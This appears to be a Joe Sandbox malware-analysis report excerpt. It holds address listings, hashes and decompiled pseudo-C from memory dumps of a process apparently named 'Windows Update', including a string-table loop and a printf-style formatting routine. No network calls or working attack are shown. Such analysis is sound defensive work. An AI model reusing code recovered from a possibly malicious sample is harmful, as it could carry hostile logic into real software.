                                                                                  0x00f4ea1c
                                                                                  0x00f4ea23
                                                                                  0x00f4ea2a
                                                                                  0x00f4ea31
                                                                                  0x00f4ea38
                                                                                  0x00f4ea3f
                                                                                  0x00f4ea46
                                                                                  0x00f4ea4d
                                                                                  0x00f4ea54
                                                                                  0x00f4ea5b
                                                                                  0x00f4ea62
                                                                                  0x00f4ea69
                                                                                  0x00f4ec57
                                                                                  0x00f4ec5a
                                                                                  0x00f4ec60
                                                                                  0x00f4ec63
                                                                                  0x00f4ec76
                                                                                  0x00f4ec6f
                                                                                  0x00f4ec6f
                                                                                  0x00000000
                                                                                  0x00f4ec6f
                                                                                  0x00f4ec63
                                                                                  0x00f4ea70
                                                                                  0x00f4ea7f
                                                                                  0x00f4ea82
                                                                                  0x00f4ea86
                                                                                  0x00f4ea89
                                                                                  0x00f4ec06
                                                                                  0x00f4ec0a
                                                                                  0x00f4ec44
                                                                                  0x00f4ec47
                                                                                  0x00f4ec10
                                                                                  0x00f4ec13
                                                                                  0x00f4ec18
                                                                                  0x00f4ec1c
                                                                                  0x00f4ec21
                                                                                  0x00f4ec28
                                                                                  0x00f4ec28
                                                                                  0x00f4ec21
                                                                                  0x00f4ec2a
                                                                                  0x00f4ec2a
                                                                                  0x00f4ec48
                                                                                  0x00f4ec49
                                                                                  0x00f4ec49
                                                                                  0x00f4ec50
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4ec50
                                                                                  0x00f4ea8f
                                                                                  0x00f4ea92
                                                                                  0x00f4ea95
                                                                                  0x00f4ea95
                                                                                  0x00f4ea99
                                                                                  0x00f4ea9e
                                                                                  0x00f4ea9f
                                                                                  0x00f4eaa3
                                                                                  0x00f4eaa6
                                                                                  0x00f4eaa9
                                                                                  0x00f4eaae
                                                                                  0x00f4eab3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eab5
                                                                                  0x00f4eab9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eabb
                                                                                  0x00f4eac3
                                                                                  0x00f4ebce
                                                                                  0x00f4ebce
                                                                                  0x00f4ebd2
                                                                                  0x00f4ebd5
                                                                                  0x00f4ebdc
                                                                                  0x00f4ebdd
                                                                                  0x00f4ebe0
                                                                                  0x00f4ebe5
                                                                                  0x00f4ebe7
                                                                                  0x00f4ebe8
                                                                                  0x00f4ebeb
                                                                                  0x00f4ebee
                                                                                  0x00f4ebf3
                                                                                  0x00f4ebf8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4ebfa
                                                                                  0x00f4ec01
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4ec03
                                                                                  0x00000000
                                                                                  0x00f4ec03
                                                                                  0x00f4ec37
                                                                                  0x00f4ec3a
                                                                                  0x00f4ec3b
                                                                                  0x00000000
                                                                                  0x00f4ec3b
                                                                                  0x00f4eac9
                                                                                  0x00f4eac9
                                                                                  0x00f4eacd
                                                                                  0x00f4ead2
                                                                                  0x00f4eb83
                                                                                  0x00f4eb83
                                                                                  0x00f4eb87
                                                                                  0x00f4eb89
                                                                                  0x00f4eb98
                                                                                  0x00f4eb98
                                                                                  0x00f4eb9c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eb8f
                                                                                  0x00f4eba1
                                                                                  0x00f4eba3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eba5
                                                                                  0x00f4eba6
                                                                                  0x00f4ebaa
                                                                                  0x00f4ebab
                                                                                  0x00f4ebb4
                                                                                  0x00f4ebb9
                                                                                  0x00f4ebc1
                                                                                  0x00f4ebc4
                                                                                  0x00f4ebc7
                                                                                  0x00f4ebc8
                                                                                  0x00000000
                                                                                  0x00f4ebc8
                                                                                  0x00f4eb91
                                                                                  0x00f4eb95
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eb97
                                                                                  0x00f4eb97
                                                                                  0x00f4eb9e
                                                                                  0x00000000
                                                                                  0x00f4eae1
                                                                                  0x00f4eae1
                                                                                  0x00f4eae3
                                                                                  0x00f4eb09
                                                                                  0x00f4eb09
                                                                                  0x00f4eb0d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eb00
                                                                                  0x00f4eb7e
                                                                                  0x00f4eb13
                                                                                  0x00f4eb17
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eb25
                                                                                  0x00f4eb2d
                                                                                  0x00f4eb32
                                                                                  0x00f4eb36
                                                                                  0x00f4eb3b
                                                                                  0x00f4eb46
                                                                                  0x00f4eb55
                                                                                  0x00f4eb5d
                                                                                  0x00f4eb5e
                                                                                  0x00f4eb62
                                                                                  0x00f4eb6e
                                                                                  0x00f4eb74
                                                                                  0x00f4eb75
                                                                                  0x00000000
                                                                                  0x00f4eb75
                                                                                  0x00f4eb02
                                                                                  0x00f4eb06
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00f4eb08
                                                                                  0x00f4eb08
                                                                                  0x00f4eb0f
                                                                                  0x00000000
                                                                                  0x00f4eb0f
                                                                                  0x00f4ead2
                                                                                  0x00f4eaee
                                                                                  0x00f4eaf4
                                                                                  0x00f4eaf5
                                                                                  0x00000000
                                                                                  0x00f4eaf5
                                                                                  0x00000000

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @A$ AA$ BA$(@A$(AA$(BA$0@A$0AA$0BA$8@A$8AA$8BA$@@A$@AA$@BA$H@A$HAA$HBA$P@A$PAA$PBA$X@A$XAA$XBA$`@A$`AA$`BA$h?A$h@A$hAA$hBA$p?A$p@A$pAA$pBA$t?A$x?A$x@A$xAA$xBA$?A$?A$@A$@A$AA$AA
                                                                                  • API String ID: 0-2473593039
                                                                                  • Opcode ID: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                                  • Instruction ID: 97030255861f08fa7ceb3b970be00145aa5947ee7f7d3ec0789ceb9b9de53654
                                                                                  • Opcode Fuzzy Hash: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                                  • Instruction Fuzzy Hash: 68F146B0C002599EDB21CF95D8487DEBFB0BB96318F5081CAD9593B241C7B90AC9DF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00F41478, Relevance: 10.1, Strings: 8, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 21%
                                                                                  			E00F41478(void* __ecx, void* __fp0) {
				void* __esi;
				void* _t57;
				void* _t58;
				void* _t65;
				void* _t68;
				void* _t71;
				void* _t84;
				signed int _t87;
				void* _t89;
				signed int _t93;
				intOrPtr _t97;
				intOrPtr _t98;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t111;

				_t111 = __fp0;
				_t89 = __ecx;
				_t100 = _t102 - 0x6c;
				_t103 = _t102 - 0x474;
				 *((intOrPtr*)(_t100 + 0x4c)) = 0x4125f8;
				 *((intOrPtr*)(_t100 + 0x50)) = 0x412608;
				 *((intOrPtr*)(_t100 + 0x54)) = 0x412618;
				 *((intOrPtr*)(_t100 + 0x58)) = 0x41262c;
				 *((intOrPtr*)(_t100 + 0x1c)) = 0x41263c;
				 *((intOrPtr*)(_t100 + 0x20)) = 0x412648;
				 *((intOrPtr*)(_t100 + 0x24)) = 0x412654;
				 *((intOrPtr*)(_t100 + 0x28)) = 0x412664;
				 *((intOrPtr*)(_t100 + 0x3c)) = 0x412670;
				 *((intOrPtr*)(_t100 + 0x40)) = 0x412680;
				 *((intOrPtr*)(_t100 + 0x44)) = 0x412690;
				 *((intOrPtr*)(_t100 + 0x48)) = 0x4126a4;
				 *((intOrPtr*)(_t100 + 0x2c)) = 0x4126b4;
				 *((intOrPtr*)(_t100 + 0x30)) = 0x4126c0;
				 *((intOrPtr*)(_t100 + 0x34)) = 0x4126cc;
				 *((intOrPtr*)(_t100 + 0x38)) = 0x4126dc;
				 *((intOrPtr*)(_t100 + 0x5c)) = 0x4126e8;
				 *((intOrPtr*)(_t100 + 0x60)) = 0x412700;
				 *((intOrPtr*)(_t100 + 0x64)) = 0x412718;
				 *((intOrPtr*)(_t100 + 0x68)) = 0x412734;
				_t87 = 0;
				do {
					_push(0x7f);
					_push(0);
					_push(_t100 - 0x63);
					 *((char*)(_t100 - 0x64)) = 0;
					L00F503F4();
					_push(_t100 - 0x64);
					_t93 = _t87 << 2;
					_push( *((intOrPtr*)(_t100 + _t93 + 0x4c)));
					_push( *((intOrPtr*)(_t100 + 0x78)));
					_t57 = 0x7f;
					_t58 = E00F4D9F2(_t57, _t89);
					_t103 = _t103 + 0x18;
					if(_t58 == 0) {
						E00F4104A(_t100 - 0x408);
						_push(_t100 - 0x64);
						_push(_t100 - 0x1f4);
						L00F503FA();
						_t97 =  *((intOrPtr*)(_t100 + 0x78));
						 *((intOrPtr*)(_t100 - 0x37c)) =  *((intOrPtr*)(_t100 + 0x7c));
						_t34 = _t87 + 1; // 0x1
						 *((intOrPtr*)(_t100 - 0x1f8)) = _t34;
						_push(_t100 - 0x2f8);
						_push( *((intOrPtr*)(_t100 + _t93 + 0x1c)));
						_push(_t97);
						_t65 = 0x7f;
						E00F4D9F2(_t65, _t89);
						_push(_t100 - 0x3fc);
						_push(0x41274c);
						_push(_t97);
						_t68 = 0x7f;
						E00F4D9F2(_t68, _t89);
						_push(_t100 - 0x378);
						_push(0x412760);
						_push(_t97);
						_t71 = 0x7f;
						E00F4D9F2(_t71, _t89);
						_t105 = _t103 + 0x2c;
						if(_t87 != 3) {
							_push(_t100 - 0x278);
							_push(0x412664);
							_push(_t97);
							_t84 = 0x7f;
							E00F4D9F2(_t84, _t89);
							_t105 = _t105 + 0xc;
						}
						E00F4D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x2c)), _t100 - 0x74);
						E00F4D9CB(_t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x5c)), _t100 - 0x70);
						_t103 = _t105 + 0x18;
						_t98 =  *((intOrPtr*)(_t100 + 0x74));
						E00F412DE(_t98, _t89, _t97,  *((intOrPtr*)(_t100 + _t93 + 0x3c)), _t100 - 0x174, 0);
						_push(_t98 + 0xa9c);
						_push(_t100 - 0xf4);
						L00F503FA();
						_pop(_t89);
						_t58 = E00F41279(_t100 - 0x408, _t111, _t98);
					}
					_t87 = _t87 + 1;
				} while (_t87 < 4);
				return _t58;
			}




















                                                                                  0x00f41478
                                                                                  0x00f41478
                                                                                  0x00f41479
                                                                                  0x00f4147d
                                                                                  0x00f41486
                                                                                  0x00f4148d
                                                                                  0x00f41494
                                                                                  0x00f4149b
                                                                                  0x00f414a2
                                                                                  0x00f414a9
                                                                                  0x00f414b0
                                                                                  0x00f414b7
                                                                                  0x00f414be
                                                                                  0x00f414c5
                                                                                  0x00f414cc
                                                                                  0x00f414d3
                                                                                  0x00f414da
                                                                                  0x00f414e1
                                                                                  0x00f414e8
                                                                                  0x00f414ef
                                                                                  0x00f414f6
                                                                                  0x00f414fd
                                                                                  0x00f41504
                                                                                  0x00f4150b
                                                                                  0x00f41512
                                                                                  0x00f41514
                                                                                  0x00f41514
                                                                                  0x00f41519
                                                                                  0x00f4151b
                                                                                  0x00f4151c
                                                                                  0x00f41520
                                                                                  0x00f41528
                                                                                  0x00f4152b
                                                                                  0x00f4152e
                                                                                  0x00f41532
                                                                                  0x00f41537
                                                                                  0x00f41538
                                                                                  0x00f4153d
                                                                                  0x00f41542
                                                                                  0x00f4154e
                                                                                  0x00f41556
                                                                                  0x00f4155d
                                                                                  0x00f4155e
                                                                                  0x00f41566
                                                                                  0x00f41569
                                                                                  0x00f4156f
                                                                                  0x00f41572
                                                                                  0x00f4157e
                                                                                  0x00f4157f
                                                                                  0x00f41583
                                                                                  0x00f41586
                                                                                  0x00f41587
                                                                                  0x00f41592
                                                                                  0x00f41593
                                                                                  0x00f41598
                                                                                  0x00f4159b
                                                                                  0x00f4159c
                                                                                  0x00f415a7
                                                                                  0x00f415a8
                                                                                  0x00f415ad
                                                                                  0x00f415b0
                                                                                  0x00f415b1
                                                                                  0x00f415b6
                                                                                  0x00f415bc
                                                                                  0x00f415c4
                                                                                  0x00f415c5
                                                                                  0x00f415ca
                                                                                  0x00f415cd
                                                                                  0x00f415ce
                                                                                  0x00f415d3
                                                                                  0x00f415d3
                                                                                  0x00f415df
                                                                                  0x00f415ed
                                                                                  0x00f415f2
                                                                                  0x00f41603
                                                                                  0x00f41608
                                                                                  0x00f41613
                                                                                  0x00f4161a
                                                                                  0x00f4161b
                                                                                  0x00f41621
                                                                                  0x00f41629
                                                                                  0x00f41629
                                                                                  0x00f4162e
                                                                                  0x00f4162f
                                                                                  0x00f4163f

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, Offset: 00EE0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2111740027.0000000000EE0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000002.00000002.2111812388.0000000000F62000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_ee0000_Windows Update.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,&A$4'A$<&A$H&A$T&A$d&A$p&A$&A
                                                                                  • API String ID: 0-3237638986
                                                                                  • Opcode ID: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                                  • Instruction ID: 7f5c2efa4bd059ce8f95a4a84211ad586e2e3b242cce9cc3e249677ab55c694f
                                                                                  • Opcode Fuzzy Hash: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                                  • Instruction Fuzzy Hash: 46415FB290021DABDB20DF90CD85ADE3BA8EF14304F104566FD18D7191D7B89A98CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00EFC77E, Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 327COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 98%
                                                                                  			E00EFC77E(char* __ebx, signed int* __esi) {
				signed int _t158;
				signed int _t160;
				intOrPtr _t162;
				signed int _t164;
				void* _t167;
				signed char _t168;
				signed char _t170;
				signed int _t175;
				signed int _t181;
				signed int _t183;
				void* _t185;
				signed char _t196;
				intOrPtr* _t198;
				void* _t199;
				void* _t200;
				signed int _t205;
				char* _t207;
				signed char* _t208;
				signed char* _t209;
				signed char* _t211;
				signed char* _t212;
				signed char _t213;
				signed char _t231;
				signed char* _t233;
				void* _t235;
				signed int _t236;
				void* _t239;
				void* _t241;
				void* _t242;
				void* _t244;
				signed int _t246;
				signed int _t248;
				char* _t250;
				signed char _t251;
				signed int* _t254;
				void* _t256;
				void* _t258;
				signed int* _t259;
				signed int* _t261;
				signed char _t262;
				void* _t263;
				void* _t265;
				signed int _t294;
				signed int _t306;

				_t207 = __ebx;
				 *((char*)(_t265 + 0x13)) = 0;
				 *((char*)(_t265 + 0x1d)) = 1;
				if(( *(__ebx + 2) & 0x00000001) == 0) {
					if( *((char*)(_t265 + 0x13)) == 0) {
						_t254 = __esi + _t213;
						_t246 =  *(_t254 - 4);
						 *(_t265 + 0x34) =  *(_t265 + 0x34) & 0x00000000;
					} else {
						_t246 =  *__esi;
						_t254 =  &(__esi[2]);
						 *(_t265 + 0x34) = __esi[1];
					}
					 *(_t263 + 0x14) = _t254;
					 *((char*)(_t265 + 0x13)) = 0;
				} else {
					if( *((char*)(_t265 + 0x13)) == 0) {
						_t261 = _t259 + _t213;
						_t175 =  *(_t261 - 4);
						asm("cdq");
					} else {
						_t175 =  *_t259;
						_t232 = _t259[1];
						_t261 =  &(_t259[2]);
					}
					_t294 = _t232;
					 *(_t263 + 0x14) = _t261;
					if(_t294 > 0 || _t294 >= 0 && _t175 >= 0) {
						_t246 = _t175;
						 *(_t265 + 0x34) = _t232;
						if( *((char*)(_t265 + 0x26)) == 0) {
							 *((char*)(_t265 + 0x13)) = (_t175 & 0xffffff00 |  *((char*)(_t265 + 0x25)) == 0x00000000) - 0x00000001 & 0x00000020;
						} else {
							 *((char*)(_t265 + 0x13)) = 0x2b;
						}
					} else {
						asm("adc edx, 0x0");
						_t232 =  ~_t232;
						_t246 =  ~_t175;
						 *(_t265 + 0x34) = _t232;
						 *((char*)(_t265 + 0x13)) = 0x2d;
					}
				}
				_t160 = _t246 |  *(_t265 + 0x34);
				if(_t160 == 0) {
					 *(_t265 + 0x1f) = _t160;
				}
				if( *((char*)(_t265 + 0x27)) != 0) {
					_t213 = 0 |  *((intOrPtr*)(_t265 + 0x13)) != 0x00000000;
					_t205 =  *(_t265 + 0x20) - _t213;
					if( *(_t265 + 0x14) < _t205) {
						 *(_t265 + 0x14) = _t205;
					}
				}
				 *(_t265 + 0x18) = _t265 + 0x1a5;
				if( *(_t265 + 0x1c) == 0x10) {
					_t199 = E00F2BB5D(_t246,  *((intOrPtr*)(_t265 + 0x3c)), 0xa, 0);
					_t262 = _t213;
					 *((intOrPtr*)(_t265 + 0x3c)) = _t207;
					if(_t262 >= 4 || E00F2BADD(_t199, _t232, 0xa, 0) == 1 && _t232 == 0) {
						_t262 = 0;
					}
					_t200 = _t262 + _t262;
					_t114 = _t200 + 0x4441d4; // 0x12969
					_t213 =  *_t114;
					_t115 = _t200 + 0x4441d5; // 0x129
					 *((char*)(_t265 + 0x1a4)) =  *_t115;
					 *(_t265 + 0x1a3) = _t213;
					 *(_t265 + 0x18) = _t265 + 0x1a3;
				}
				_t162 =  *((intOrPtr*)(_t265 + 0x28));
				asm("cdq");
				_t256 = ( *(_t162 + 4) & 0x000000ff) + 0x444110;
				 *(_t265 + 0x40) =  *(_t162 + 1) & 0x000000ff;
				 *(_t265 + 0x44) = _t232;
				do {
					 *(_t265 + 0x1c) =  *(_t265 + 0x1c) - 1;
					_t164 = E00F2BB5D(_t246,  *((intOrPtr*)(_t265 + 0x3c)),  *(_t265 + 0x44),  *(_t265 + 0x44));
					_t306 = _t232;
					_t213 =  *((intOrPtr*)(_t213 + _t256));
					 *( *(_t265 + 0x18)) = _t213;
					 *((intOrPtr*)(_t265 + 0x3c)) = _t207;
					_t246 = _t164;
					 *(_t265 + 0x34) = _t232;
				} while (_t306 > 0 || _t306 >= 0 && _t246 > 0);
				_t233 =  *(_t265 + 0x18);
				_t167 =  *(_t265 + 0x14) - _t265 + 0x1a5 + _t233;
				if(_t167 <= 0) {
					L90:
					_t168 =  *((intOrPtr*)(_t265 + 0x13));
					if(_t168 != 0) {
						_t233 = _t233 - 1;
						 *(_t265 + 0x18) = _t233;
						 *_t233 = _t168;
					}
					if( *(_t265 + 0x1f) == 0) {
						L97:
						_t258 = _t265 + 0x1a5 - _t233;
						_t248 =  *(_t265 + 0x20);
						if( *((char*)(_t265 + 0x1e)) == 0) {
							_t193 = _t248 - _t258;
							if(_t248 - _t258 > 0) {
								E00EFC500(_t193,  *((intOrPtr*)(_t263 + 8)));
							}
						}
						if(_t258 > 0) {
							E00EFCC69( *((intOrPtr*)(_t263 + 8)),  *(_t265 + 0x1c), _t258);
						}
						if( *((char*)(_t265 + 0x1e)) != 0) {
							_t188 = _t248 - _t258;
							if(_t248 - _t258 > 0) {
								E00EFC500(_t188,  *((intOrPtr*)(_t263 + 8)));
							}
						}
						if( *(_t265 + 0x2c) != 0) {
							E00EFC110( *(_t265 + 0x2c));
						}
						 *(_t263 + 0x10) =  &(( *(_t263 + 0x10))[1]);
						_t158 =  *( *(_t263 + 0x10));
						if(_t158 != 0) {
							_t208 =  *(_t263 + 0x10);
							_t259 =  *(_t263 + 0x14);
							if(_t158 == 0x25) {
								L8:
								_t209 =  &(_t208[1]);
								_t170 =  *_t209;
								 *(_t263 + 0x10) = _t209;
								if(_t170 == 0) {
									_t158 = E00EFCC69( *((intOrPtr*)(_t263 + 8)), 0x44a2c4, 1);
									goto L98;
								} else {
									 *((char*)(_t265 + 0x27)) = 0;
									 *(_t265 + 0x1f) = 0;
									 *((char*)(_t265 + 0x25)) = 0;
									 *((char*)(_t265 + 0x26)) = 0;
									 *((char*)(_t265 + 0x1e)) = 0;
									do {
										_t235 = _t170 - 0x20;
										if(_t235 == 0) {
											 *((char*)(_t265 + 0x25)) = 1;
											goto L21;
										}
										_t239 = _t235 - 1;
										if(_t239 == 0) {
											goto L21;
										}
										_t241 = _t239;
										if(_t241 == 0) {
											 *(_t265 + 0x1f) = 1;
											goto L21;
										}
										_t242 = _t241 - 8;
										if(_t242 == 0) {
											 *((char*)(_t265 + 0x26)) = 1;
											goto L21;
										}
										_t244 = _t242;
										if(_t244 == 0) {
											 *((char*)(_t265 + 0x1e)) = 1;
											goto L21;
										}
										if(_t244 != 3) {
											break;
										}
										 *((char*)(_t265 + 0x27)) = 1;
										L21:
										_t209 =  &(_t209[1]);
										_t170 =  *_t209;
										 *(_t263 + 0x10) = _t209;
									} while (_t170 != 0);
									 *(_t265 + 0x20) =  *(_t265 + 0x20) & 0x00000000;
									if(_t170 != 0x2a) {
										if(_t170 < 0x30) {
											L31:
											if(_t170 != 0x2e) {
												 *(_t265 + 0x14) =  *(_t265 + 0x14) | 0xffffffff;
												L41:
												if(_t170 != 0x6c) {
													 *((char*)(_t265 + 0x1d)) = 0;
													L45:
													 *((char*)(_t265 + 0x13)) = 0;
													L46:
													_t250 = 0x444140;
													_t207 = 0x444140;
													 *((intOrPtr*)(_t265 + 0x28)) = 0x444140;
													 *(_t265 + 0x1c) = 0;
													_t236 = 0;
													while(_t170 !=  *_t250) {
														_t250 = _t250 + 6;
														_t236 = _t236 + 1;
														if(_t250 < 0x4441b2) {
															continue;
														}
														L53:
														 *(_t265 + 0x2c) =  *(_t265 + 0x2c) & 0x00000000;
														_t213 = 4;
														if( *(_t265 + 0x14) > 0x136 && ( *(_t207 + 2) & _t213) == 0) {
															 *(_t265 + 0x14) = 0x136;
														}
														_t232 =  *(_t265 + 0x1c);
														_t158 = ( *(_t265 + 0x1c) & 0x000000ff) - 1;
														if(_t158 > 0xf) {
															goto L98;
														} else {
															goto ( *((intOrPtr*)(0x413c1c + _t158 * 4)));
														}
													}
													_t207 = 0x444140 + _t236 * 6;
													 *((intOrPtr*)(_t265 + 0x28)) = _t207;
													if( *((intOrPtr*)(_t263 + 0xc)) != 0 || ( *(_t207 + 2) & 0x00000002) == 0) {
														 *(_t265 + 0x1c) =  *((intOrPtr*)(_t207 + 3));
														goto L53;
													} else {
														goto L98;
													}
												}
												_t211 =  &(_t209[1]);
												_t170 =  *_t211;
												 *((char*)(_t265 + 0x1d)) = 1;
												 *(_t263 + 0x10) = _t211;
												if(_t170 != 0x6c) {
													goto L45;
												}
												_t212 =  &(_t211[1]);
												_t170 =  *_t212;
												 *((char*)(_t265 + 0x13)) = 1;
												 *(_t263 + 0x10) = _t212;
												goto L46;
											}
											 *(_t265 + 0x14) =  *(_t265 + 0x14) & 0x00000000;
											_t209 =  &(_t209[1]);
											_t170 =  *_t209;
											 *(_t263 + 0x10) = _t209;
											if(_t170 != 0x2a) {
												while(_t170 >= 0x30) {
													if(_t170 > 0x39) {
														goto L41;
													}
													_t48 = _t170 - 0x30; // -48
													_t209 =  &(_t209[1]);
													 *(_t265 + 0x14) =  *(_t265 + 0x14) * 0xa + _t48;
													_t170 =  *_t209;
													 *(_t263 + 0x10) = _t209;
												}
												goto L41;
											}
											_t181 =  *_t259;
											 *(_t263 + 0x14) = _t259;
											 *(_t265 + 0x14) = _t181;
											if(_t181 < 0) {
												 *(_t265 + 0x14) =  ~( *(_t265 + 0x14));
											}
											_t209 =  &(_t209[1]);
											_t170 =  *_t209;
											 *(_t263 + 0x10) = _t209;
											goto L41;
										}
										while(_t170 <= 0x39) {
											_t33 = _t170 - 0x30; // -48
											_t209 =  &(_t209[1]);
											 *(_t265 + 0x20) =  *(_t265 + 0x20) * 0xa + _t33;
											_t170 =  *_t209;
											 *(_t263 + 0x10) = _t209;
											if(_t170 >= 0x30) {
												continue;
											}
											break;
										}
										L29:
										if( *(_t265 + 0x20) > 0x154) {
											 *(_t265 + 0x20) = 0x154;
										}
										goto L31;
									}
									_t183 =  *_t259;
									_t259 =  &(_t259[1]);
									 *(_t263 + 0x14) = _t259;
									 *(_t265 + 0x20) = _t183;
									if(_t183 < 0) {
										 *(_t265 + 0x20) =  ~( *(_t265 + 0x20));
										 *((char*)(_t265 + 0x1e)) = 1;
									}
									_t209 =  &(_t209[1]);
									_t170 =  *_t209;
									 *(_t263 + 0x10) = _t209;
									goto L29;
								}
							} else {
								 *(_t265 + 0x18) = _t208;
								_t185 = 1;
								while(1) {
									_t208 =  &(_t208[1]);
									_t251 =  *_t208;
									if(_t251 == 0x25) {
										break;
									}
									if(_t251 == 0) {
										break;
									} else {
										_t185 = _t185 + 1;
										continue;
									}
								}
								_t158 = E00EFCC69( *((intOrPtr*)(_t263 + 8)),  *(_t265 + 0x1c), _t185);
								if(_t251 == 0) {
									goto L98;
								}
								goto L8;
							}
						} else {
						}
						L98:
						return _t158;
					} else {
						_t196 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0x28)) + 5));
						if(_t196 == 0) {
							goto L97;
						}
						_t198 = (_t196 & 0x000000ff) + 0x444134;
						_t231 =  *_t198;
						if(_t231 == 0) {
							goto L97;
						} else {
							goto L95;
						}
						do {
							L95:
							_t233 = _t233 - 1;
							_t198 = _t198 + 1;
							 *_t233 = _t231;
							_t231 =  *_t198;
						} while (_t231 != 0);
						 *(_t265 + 0x18) = _t233;
						goto L97;
					}
				} else {
					goto L88;
				}
				do {
					L88:
					_t233 = _t233 - 1;
					_t167 = _t167 - 1;
					 *_t233 = 0x30;
				} while (_t167 > 0);
				 *(_t265 + 0x18) = _t233;
				goto L90;
			}















































                                                                                  0x00efc77e
                                                                                  0x00efc77e
                                                                                  0x00efc783
                                                                                  0x00efc78c
                                                                                  0x00efc7f2
                                                                                  0x00efc802
                                                                                  0x00efc804
                                                                                  0x00efc807
                                                                                  0x00efc7f4
                                                                                  0x00efc7f7
                                                                                  0x00efc7f9
                                                                                  0x00efc7fc
                                                                                  0x00efc7fc
                                                                                  0x00efc80c
                                                                                  0x00efc80f
                                                                                  0x00efc78e
                                                                                  0x00efc793
                                                                                  0x00efc79f
                                                                                  0x00efc7a1
                                                                                  0x00efc7a4
                                                                                  0x00efc795
                                                                                  0x00efc795
                                                                                  0x00efc797
                                                                                  0x00efc79a
                                                                                  0x00efc79a
                                                                                  0x00efc7a5
                                                                                  0x00efc7a7
                                                                                  0x00efc7aa
                                                                                  0x00efc7cb
                                                                                  0x00efc7cd
                                                                                  0x00efc7d1
                                                                                  0x00efc7e7
                                                                                  0x00efc7d3
                                                                                  0x00efc7d3
                                                                                  0x00efc7d3
                                                                                  0x00efc7b2
                                                                                  0x00efc7b4
                                                                                  0x00efc7b7
                                                                                  0x00efc7b9
                                                                                  0x00efc7bb
                                                                                  0x00efc7bf
                                                                                  0x00efc7bf
                                                                                  0x00efc7aa
                                                                                  0x00efc816
                                                                                  0x00efc81a
                                                                                  0x00efc81c
                                                                                  0x00efc81c
                                                                                  0x00efc825
                                                                                  0x00efc831
                                                                                  0x00efc834
                                                                                  0x00efc83a
                                                                                  0x00efc83c
                                                                                  0x00efc83c
                                                                                  0x00efc83a
                                                                                  0x00efc84c
                                                                                  0x00efc850
                                                                                  0x00efc85b
                                                                                  0x00efc860
                                                                                  0x00efc865
                                                                                  0x00efc869
                                                                                  0x00efc87f
                                                                                  0x00efc87f
                                                                                  0x00efc881
                                                                                  0x00efc884
                                                                                  0x00efc884
                                                                                  0x00efc88a
                                                                                  0x00efc890
                                                                                  0x00efc89e
                                                                                  0x00efc8a5
                                                                                  0x00efc8a5
                                                                                  0x00efc8a9
                                                                                  0x00efc8b5
                                                                                  0x00efc8b6
                                                                                  0x00efc8bc
                                                                                  0x00efc8c0
                                                                                  0x00efc8c4
                                                                                  0x00efc8c8
                                                                                  0x00efc8d5
                                                                                  0x00efc8da
                                                                                  0x00efc8e0
                                                                                  0x00efc8e3
                                                                                  0x00efc8e5
                                                                                  0x00efc8e9
                                                                                  0x00efc8eb
                                                                                  0x00efc8eb
                                                                                  0x00efc8fb
                                                                                  0x00efc908
                                                                                  0x00efc90c
                                                                                  0x00efc91b
                                                                                  0x00efc91b
                                                                                  0x00efc921
                                                                                  0x00efc923
                                                                                  0x00efc924
                                                                                  0x00efc928
                                                                                  0x00efc928
                                                                                  0x00efc92f
                                                                                  0x00efc958
                                                                                  0x00efc95f
                                                                                  0x00efcba8
                                                                                  0x00efcbac
                                                                                  0x00efcbb0
                                                                                  0x00efcbb4
                                                                                  0x00efcbb9
                                                                                  0x00efcbbe
                                                                                  0x00efcbb4
                                                                                  0x00efcbc1
                                                                                  0x00efcbcb
                                                                                  0x00efcbd1
                                                                                  0x00efcbd7
                                                                                  0x00efcbdb
                                                                                  0x00efcbdf
                                                                                  0x00efcbe4
                                                                                  0x00efcbe9
                                                                                  0x00efcbdf
                                                                                  0x00efcbef
                                                                                  0x00efcbf5
                                                                                  0x00efcbfa
                                                                                  0x00efcbfb
                                                                                  0x00efcc01
